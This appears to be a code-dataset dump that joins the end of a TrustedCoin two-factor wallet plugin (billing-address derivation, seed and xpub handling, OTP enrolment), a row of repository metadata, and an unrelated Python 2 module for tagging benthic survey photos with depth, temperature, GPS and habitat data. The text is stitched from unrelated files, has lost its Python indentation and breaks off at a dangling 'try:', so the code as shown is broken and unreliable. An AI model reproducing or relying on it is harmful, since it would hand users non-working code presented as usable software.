child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
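# Sketch of how the helpers above chain together (the wallet/storage objects are
# hypothetical):
#
#   long_id, short_id = get_user_id(wallet.storage)        # ids derived from the x1/x2 xpubs
#   billing_xpub = make_xpub(get_billing_xpub(), long_id)  # user-specific billing branch
#   addr = make_billing_address(wallet, 0, addr_type='segwit')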
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
# Not available for GRS.
return False
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(str(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
        # old versions used long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
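    # Example of the split performed above (the seed below is a placeholder, not
    # a usable mnemonic):
    #
    #   xprv1, xpub1, xprv2, xpub2 = cls.xkeys_from_seed(seed_words, '')
    #   # for a modern 12-word 2fa seed both keystores come from the same mnemonic,
    #   # derived at m/0'/ (hot) and m/1'/ (cold); pre-2.7 seeds of 20+ words are
    #   # instead split into two parts, each used as its own mnemonic.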
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
gpl-3.0
| -3,658,117,888,799,464,400
| 41.041169
| 139
| 0.603468
| false
| 3.674637
| false
| false
| false
|
jkibele/benthic_photo_survey
|
bps_package/photo_tagging.py
|
1
|
24681
|
import pyexiv2 as exiv # see note about pyexiv2 in notes.txt
import json
from ast import literal_eval
from depth_temp_log_io import *
from configuration import *
from gps_log_io import *
from common import *
# That namespace url doesn't really exist. The custom tags seem to work
# without it. Perhaps I should figure out if I really need it or not.
exiv.xmp.register_namespace('http://svarchiteuthis.com/benthicphoto/', 'BenthicPhoto')
class image_directory(object):
def __init__(self, dir_path):
if os.path.isdir(dir_path):
jpgs = [ os.path.join(dir_path,f) for f in os.listdir(dir_path) if f.lower().endswith('.jpg') and not f.startswith('.') ]
else:
raise ValueError("%s is not a directory." % dir_path)
self.path = dir_path
self.images = [ image_file(img) for img in jpgs ]
self.images.sort(key=lambda i: i.datetime) # sort the images by datetime of the image
self.image_count = len( self.images )
def __shift_datetimes__(self, time_delta_obj, verbose=True):
"""
Shift the 'date original' values of all photos in the directory. See the
warnings in the image_file.__set_datetime__ method doc string. You should
be careful about using this method.
"""
for img in self.images:
new_dt = img.__shift_datetime__( time_delta_obj, verbose=verbose )
@property
def local_datetimes(self):
return [ x.datetime for x in self.images ]
@property
def utc_datetimes(self):
return [ x.utc_datetime for x in self.images ]
@property
def exif_depths(self):
d_list = []
for img in self.images:
if img.exif_depth:
d_list.append(img.exif_depth * -1)
else:
d_list.append(0.0)
return np.array(d_list)
@property
def fuzzy_habitat_dict(self):
d = {}
for img in self.images:
for hab in img.xmp_fuzzy_habitats:
try:
d[hab] += 1
except KeyError:
d[hab] = 1
return d
def dive_record_set(self,db_path):
return dive_record_set( min(self.local_datetimes), max(self.local_datetimes), db_path )
def depth_plot(self, db_path, depth_time_offset=None):
"""
Create a plot of the depth profile with photo times and depths marked.
db_path: A string of the path to the sqlite database.
depth_time_offset: An int in seconds to offset x values by. This only
changes the plot. It does not alter any of the values or change
what gets exported to shapefile.
"""
drs = self.dive_record_set(db_path)
y = -1 * drs.depth_time_array[:,0] # depths * -1 to make negative values
x = drs.depth_time_array[:,1] # datetimes
if depth_time_offset:
x = x + td(seconds=depth_time_offset)
fig = plt.figure() # imported from matplotlib
ax = fig.add_subplot(111)
ax.plot_date(x,y,marker='.',linestyle='-',tz=pytz.timezone(LOCAL_TIME_ZONE) ) # LOCAL_TIME_ZONE from configuration.py)
ax.plot(self.local_datetimes,self.exif_depths,'r*',markersize=10,picker=5)
plt.xlabel('Date and Time')
plt.ylabel('Depth (meters)')
fig.suptitle('Photos with Depth and Time')
#print "Before def onpick"
def onpick(event):
global ann
try:
ann.remove()
except NameError:
pass
ind = event.ind[0]
fname = os.path.basename( self.images[ind].file_path )
ann_text = "Photo: %s\ndepth: %g\ndate: %s" % ( fname, self.exif_depths[ind], self.local_datetimes[ind].strftime('%Y/%m/%d %H:%M:%S') )
ann = ax.annotate(ann_text, xy=(self.local_datetimes[ind], self.exif_depths[ind]), xytext=(-20,-20),
textcoords='offset points', ha='center', va='top',
bbox=dict(boxstyle='round,pad=0.2', fc='yellow', alpha=0.3),
arrowprops=dict(arrowstyle='->', connectionstyle='arc3,rad=0.5',
color='red'))
plt.draw()
print "Photo: %s, index: %i, depth: %g, date: %s" % ( fname, ind, self.exif_depths[ind], self.local_datetimes[ind].strftime('%Y/%m/%d %H:%M:%S') )
#print "Before mpl_connect"
fig.canvas.mpl_connect('pick_event', onpick)
plt.show()
#print "after plt show"
def depth_temp_tag(self,db_path,verbose=False):
"""
Depth tag all the photos in the directory.
"""
for img in self.images:
img.depth_temp_tag(db_path,verbose)
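# Typical directory-level workflow (paths below are hypothetical):
#
#   imgs = image_directory('/data/dive_01/photos')
#   imgs.depth_temp_tag('/data/dive_01/bps.db', verbose=True)  # write depth/temp tags
#   imgs.depth_plot('/data/dive_01/bps.db')                     # visual sanity check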
class image_file(object):
"""
An object to make accessing image files and metadata easier.
"""
def __init__(self,img_path):
if os.path.exists(img_path):
self.file_path = img_path
md = exiv.ImageMetadata(img_path)
md.read()
self.md = md
else:
raise ValueError( "The file %s does not exist." % (img_path,) )
def __repr__(self):
return "Image file: %s" % (self.file_path,)
def __get_exiv_tag(self,tag_string):
"""
Try to get a pyexiv2 tag. If the tag doesn't exist, return None.
"""
try:
return self.md[tag_string]
except KeyError:
return None
def __get_exiv_tag_value(self,tag_string):
"""
Try to get a pyexiv2 tag value. If the tag doesn't exist, return None.
"""
try:
return self.md[tag_string].value
except KeyError:
return None
def __get_exiv_tag_human_value(self,tag_string):
"""
Try to get a pyexiv2 tag human value. If the tag doesn't exist, return None.
"""
try:
return self.md[tag_string].human_value
except KeyError:
return None
def exif_dict(self, exclude_panasonic_keys=True):
"""
Return a dict with all exif and xmp keys and values.
"""
exif_dict = {}
for key in self.md.xmp_keys:
if self.__get_exiv_tag_value(key):
exif_dict.update( { key : self.__get_exiv_tag_value(key) } )
for key in self.md.exif_keys:
if not ( exclude_panasonic_keys and 'Panasonic' in key.split('.') ):
if self.__get_exiv_tag_human_value(key):
exif_dict.update( { key : self.__get_exiv_tag_human_value(key)[:100] } )
return exif_dict
@property
def file_name(self):
return os.path.basename(self.file_path)
@property
def datetime(self):
"""
Try to get a datetime object for the image's creation from the
Exif.Photo.DateTimeOriginal value via pyexiv2.
"""
if self.__get_exiv_tag_value('Exif.Photo.DateTimeOriginal').tzname():
return self.__get_exiv_tag_value('Exif.Photo.DateTimeOriginal')
else:
return make_aware_of_local_tz( self.__get_exiv_tag_value('Exif.Photo.DateTimeOriginal') )
@property
def utc_datetime(self):
if self.datetime:
return utc_from_local(self.datetime)
else:
return None
@property
def exif_direction(self):
if self.__get_exiv_tag_value('Exif.GPSInfo.GPSImgDirection'):
return float( self.__get_exiv_tag_value('Exif.GPSInfo.GPSImgDirection') )
@property
def exif_lat_tag(self):
return self.__get_exiv_tag('Exif.GPSInfo.GPSLatitude')
@property
def exif_latref_tag(self):
return self.__get_exiv_tag('Exif.GPSInfo.GPSLatitudeRef')
@property
def exif_lon_tag(self):
return self.__get_exiv_tag('Exif.GPSInfo.GPSLongitude')
@property
def exif_lonref_tag(self):
return self.__get_exiv_tag('Exif.GPSInfo.GPSLongitudeRef')
@property
def exif_depth_tag(self):
return self.__get_exiv_tag('Exif.GPSInfo.GPSAltitude')
@property
def exif_depth(self):
try:
ret_val = float( self.__get_exiv_tag_value('Exif.GPSInfo.GPSAltitude') )
except TypeError:
try:
ret_val = self.__get_exiv_tag_value('Exif.GPSInfo.GPSAltitude').to_float()
except AttributeError:
ret_val = None
return ret_val
@property
def __exif_depth_temp_dict(self):
"""
This is a bit of a hack. I couldn't find a good place to store temperature
data in the exif so I went with storing a python dictionary as a string
in Exif.Photo.UserComment. I think I'm going to stop using this and store
this stuff in custom xmp tags instead. UserComment is accessible to many
photo management apps so it seems likely to get corrupted. I made it a
private method but maybe I should have just deleted it.
"""
try:
dstr = self.md['Exif.Photo.UserComment'].value
return literal_eval(dstr)
except KeyError:
return None
@property
def __exif_temperature(self):
"""
This just exposes the temperature value from the hack mentioned in the
doc string for exif_depth_temp_dict. I'm going to stop writing to this
tag so don't be surprised if this returns nothing. Actually, I think I
may just make it a private method because I don't want to delete it.
"""
        if self.__exif_depth_temp_dict:
            return self.__exif_depth_temp_dict['temp']
else:
return None
@property
def xmp_temperature(self):
return self.__get_exiv_tag_value('Xmp.BenthicPhoto.temperature')
@property
def xmp_temp_units(self):
return self.__get_exiv_tag_value('Xmp.BenthicPhoto.temp_units')
@property
def xmp_substrate(self):
return self.__get_exiv_tag_value('Xmp.BenthicPhoto.substrate')
@property
def xmp_habitat(self):
"""
xmp_habitat will be set to the dominant habitat type of all the fuzzy
habitats. Specifically, the fuzzy habitat with the highest proportion.
In the event of a tie (multiple fuzzy habitats with the same proportion)
one of the tied habitats will be chosen at random. Assignment happens
in the setHabitat method of the MainWindow in bps_gui.py.
"""
return self.__get_exiv_tag_value('Xmp.BenthicPhoto.habitat')
@property
def xmp_fuzzy_hab_dict(self):
hd_json = self.__get_exiv_tag_value('Xmp.BenthicPhoto.fuzzy_hab_dict')
if hd_json:
return json.loads(hd_json)
else:
return None
@property
def xmp_fuzzy_habitats(self):
habdict = self.xmp_fuzzy_hab_dict
if habdict:
return habdict.keys()
else:
return []
@property
def position(self):
"""
Look at the exif data and return a position object (as defined in
gps_log_io). Return None if there's no GPSInfo in the exif.
"""
if self.exif_lat_tag and self.exif_lon_tag and self.exif_latref_tag and self.exif_lonref_tag:
lat = latitude.from_exif_coord(self.exif_lat_tag.value,self.exif_latref_tag.value)
lon = longitude.from_exif_coord(self.exif_lon_tag.value,self.exif_lonref_tag.value)
return position(lat,lon)
else:
return None
def __set_datetime__(self,dt_obj):
"""
Set the date original in the exif. I don't think you want to do this
but I did want to once. If you lose the origination time for your
image you can not sync it to your gps track or your depth log so
leave this alone unless you're sure you know what you're doing.
If you screw up your data don't come crying to me. I tried to warn
you.
"""
key = 'Exif.Photo.DateTimeOriginal'
self.md[key] = exiv.ExifTag(key,dt_obj)
self.md.write()
return self.datetime
def __shift_datetime__(self,time_delta_obj,verbose=True):
"""
Shift the 'date original' in the exif by the given time delta. See the
warnings in the doc string of __set_datetime__ method. You should be
careful with this.
"""
current_dt = self.datetime
self.__set_datetime__( current_dt + time_delta_obj )
if verbose:
print "datetime of %s changed from %s to %s." % ( self.file_name, current_dt.strftime('%X, %x'), self.datetime.strftime('%X, %x') )
return self.datetime
def __set_exif_position(self,pos,verbose=False):
"""
Set the relevant exif tags to match the position object handed in.
The position object is defined over in gps_log_io.py
"""
pre = 'Exif.GPSInfo.GPS'
add_dict = {pre+'Latitude': pos.lat.exif_coord,
pre+'LatitudeRef': pos.lat.hemisphere,
pre+'Longitude': pos.lon.exif_coord,
pre+'LongitudeRef': pos.lon.hemisphere }
for k,v in add_dict.iteritems():
if verbose:
print "%s = %s" % (str(k),str(v))
self.md[k] = exiv.ExifTag(k,v)
self.md.write()
return True
def __set_exif_depth_temp(self,depth,temp,verbose=False):
from pyexiv2.utils import Rational
if depth < 0: # This can happen because there's a bit of slop in the conversion from pressure to depth
if verbose:
print "Given depth was a negative value."
depth = 0
if not depth:
return None
if not temp:
temp = 0.0 # temperature isn't important at this point so if it's not there we'll just call it zero
pre = 'Exif.GPSInfo.GPS'
#dt_str = "{'depth':%g,'temp':%g}" % (depth,temp)
dfrac = Fraction.from_float(depth).limit_denominator()
add_dict = {pre+'Altitude': Rational(dfrac.numerator,dfrac.denominator),
pre+'AltitudeRef': bytes(1),
}
#'Exif.Photo.UserComment': dt_str }
for k,v in add_dict.iteritems():
if verbose:
print "%s = %s" % (str(k),str(v))
self.md[k] = exiv.ExifTag(k,v)
self.md.write()
return True
def __set_xmp_depth_temp(self,depth,temp):
if not depth:
return None
if not temp:
temp = 0.0 # temperature isn't important at this point so if it's not there we'll just call it zero
pre = 'Xmp.BenthicPhoto.'
self.md[pre+'depth'] = str(depth)
self.md[pre+'depth_units'] = 'meters'
self.md[pre+'temperature'] = str(temp)
self.md[pre+'temp_units'] = 'celsius'
self.md.write()
def set_xmp_substrate(self, subst_str):
pre = 'Xmp.BenthicPhoto.'
self.md[pre+'substrate'] = subst_str
self.md.write()
def set_xmp_habitat(self, subst_str):
pre = 'Xmp.BenthicPhoto.'
self.md[pre+'habitat'] = subst_str
self.md.write()
def set_xmp_fuzzy_habitats(self, habdict):
habdict_json_str = json.dumps(habdict)
pre = 'Xmp.BenthicPhoto.'
self.md[pre+'fuzzy_hab_dict'] = habdict_json_str
self.md.write()
def logger_depth(self,db_path):
"""
Get the logged depth out of the db that matches the photo's timestamp.
"""
if self.utc_datetime:
depth = get_depth_for_time(self.utc_datetime, db_path, reject_threshold=30)
return depth
else:
return None
def logger_temp(self, db_path):
"""
Get the logged temperature out of the db that matches the photo's timestamp.
"""
if self.utc_datetime:
temp = get_temp_for_time(self.utc_datetime, db_path, reject_threshold=30)
return temp
else:
return None
def depth_temp_tag(self,db_path,verbose=False):
"""
Get the depth and temp readings out of the db that match the photo's origination
time (considering that the photo's time stamp is in the local timezone and the
logs are in UTC) and write those values to the image's exif data.
"""
self.__set_exif_depth_temp(self.logger_depth(db_path),self.logger_temp(db_path),verbose=verbose)
self.__set_xmp_depth_temp(self.logger_depth(db_path),self.logger_temp(db_path))
if self.exif_depth_tag:
return self.exif_depth_tag.value
else:
return None
def geotag(self,db_path,verbose=True):
"""
Get a position that matches the time of creation for the image out
of the database and set the exif data accordingly. We assume that
the photo timestamp is local and the gps position is utc.
"""
pos = get_position_for_time(self.utc_datetime,db_path,verbose=verbose)
if verbose and pos:
print "-------------------GeoTagg--------------------------------"
print "%s is going to get set to %s as %s, %s" % ( os.path.basename( self.file_path ), unicode( pos ), str(pos.lat.exif_coord), str(pos.lon.exif_coord) )
print "%s, %s in dms" % ( str(pos.lat.dms), str(pos.lon.dms) )
if pos:
self.__set_exif_position(pos,verbose)
return self.position
def __compare_position__(self,db_path):
"""
This is just for testing. Check to see if the value stored in the db
matches what we display after conversion. I want to make sure I'm not
throwing away precision in coordinate conversions.
"""
pos = get_position_for_time(self.utc_datetime,db_path,verbose=True)
print " db says: %s, %s \nexif says: %s, %s" % ( pos.lat.nmea_string, pos.lon.nmea_string, self.position.lat.nmea_string, self.position.lon.nmea_string )
if pos.lat.nmea_string == self.position.lat.nmea_string:
print "Latitudes match"
if pos.lon.nmea_string == self.position.lon.nmea_string:
print "Longitudes match"
def remove_geotagging(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
geokeys = ['Latitude','LatitudeRef','Longitude','LongitudeRef']
pre = 'Exif.GPSInfo.GPS'
for key in [pre+gk for gk in geokeys]:
if self.md.__contains__(key):
self.md.__delitem__(key)
self.md.write()
def remove_depthtagging(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
geokeys = ['Altitude','AltitudeRef']
pre = 'Exif.GPSInfo.GPS'
for key in [pre+gk for gk in geokeys]:
if self.md.__contains__(key):
self.md.__delitem__(key)
self.md.write()
def remove_temptagging(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
geokeys = ['depth','depth_units','temperature','temp_units']
pre = 'Xmp.BenthicPhoto.'
for key in [pre+gk for gk in geokeys]:
if self.md.__contains__(key):
self.md.__delitem__(key)
self.md.write()
def remove_substratetagging(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
key = 'Xmp.BenthicPhoto.substrate'
if self.md.__contains__(key):
self.md.__delitem__(key)
self.md.write()
def remove_habitattag(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
key = 'Xmp.BenthicPhoto.habitat'
if self.md.__contains__(key):
self.md.__delitem__(key)
self.md.write()
def remove_fuzzyhabitats(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
key = 'Xmp.BenthicPhoto.fuzzy_hab_dict'
if self.md.__contains__(key):
self.md.__delitem__(key)
self.md.write()
def remove_habitattagging(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
self.remove_habitattag()
self.remove_fuzzyhabitats()
def remove_all_tagging(self):
"""
You probably won't need to do this but I did a few times during testing.
"""
self.remove_geotagging()
self.remove_depthtagging()
self.remove_temptagging()
self.remove_substratetagging()
self.remove_habitattagging()
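# Equivalent single-photo workflow (paths and substrate value are hypothetical):
#
#   img = image_file('/data/dive_01/photos/P1010001.JPG')
#   img.depth_temp_tag('/data/dive_01/bps.db')
#   img.geotag('/data/dive_01/bps.db')
#   img.set_xmp_substrate('sand')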
def exif_tag_jpegs(photo_dir,db_path):
for fname in os.listdir(photo_dir):
if fname.lower().endswith('.jpg'):
imf = image_file( os.path.join(photo_dir,fname) )
imf.depth_temp_tag(db_path)
            imf.geotag(db_path)
if imf.exif_depth_tag:
dstr = imf.exif_depth_tag.human_value
else:
dstr = 'None'
            if imf.xmp_temperature:
                tstr = "%s C" % imf.xmp_temperature
else:
tstr = 'None'
print "Image: %s - Depth: %s, Temp %s, Position: %s" % (fname,dstr,tstr,imf.position)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Tag a photos with position, depth, and temperature from a gps and a Sensus Ultra depth and temperature logger.')
parser.add_argument('photo_dir', nargs='?', type=str, help='The directory that contains photos you would like tagged.')
parser.add_argument('db_path', nargs='?', type=str, help='The database that contains the depth and location information you want to tag the photos with.')
args = parser.parse_args()
    exif_tag_jpegs(args.photo_dir, args.db_path)
#### Pretty much just testing garbage below here #######
#### Why don't I delete it? Good question. #######
def check_time_tags(img):
md = get_photo_metadata(img)
    timetags = [tag for tag in md.exif_keys if tag.find('Time') != -1]
for t in timetags:
print "%s: %s" % (t,md[t])
def read_gps_crap(img):
    md = get_photo_metadata(img)
try:
gpstag = md['Exif.Image.GPSTag'].human_value
except KeyError:
gpstag = 'not set'
try:
lat = md['Exif.GPSInfo.GPSLatitude'].human_value
except KeyError:
lat = 'not set'
try:
lon = md['Exif.GPSInfo.GPSLongitude'].human_value
except KeyError:
lon = 'not set'
print "GPSTag: %s, Lat: %s, Lon: %s" % ( str(gpstag), str(lat), str(lon) )
def read_gps_crap_from_dir(dir):
for fname in os.listdir(dir):
if fname.lower().endswith('.jpg'):
read_gps_crap(os.path.join(dir,fname))
def shift_time_for_photos(direc,time_delta):
for fname in os.listdir(direc):
if fname.lower().endswith('.jpg'):
imf = image_file( os.path.join( direc,fname ) )
orig_time = imf.datetime
imf.__set_datetime__( orig_time + time_delta )
print "Changed %s from %s to %s." % ( fname, orig_time.strftime('%H:%M'), imf.datetime.strftime('%H:%M') )
def photo_times_for_dir(dir):
for fname in os.listdir(dir):
if fname.lower().endswith('.jpg'):
img = os.path.join(dir,fname)
md = get_photo_metadata(img)
ptime = get_photo_datetime(md)
if ptime:
ending = ptime.strftime('%Y-%m-%d %H:%M:%S')
else:
ending = 'no time tag'
print "%s: %s" % (fname,ending)
def get_photo_metadata(img_path):
md = exiv.ImageMetadata(img_path)
md.read()
return md
def get_photo_datetime(md):
"""If I find inconsistency in exif tags, I may have to get a little more creative
here."""
try:
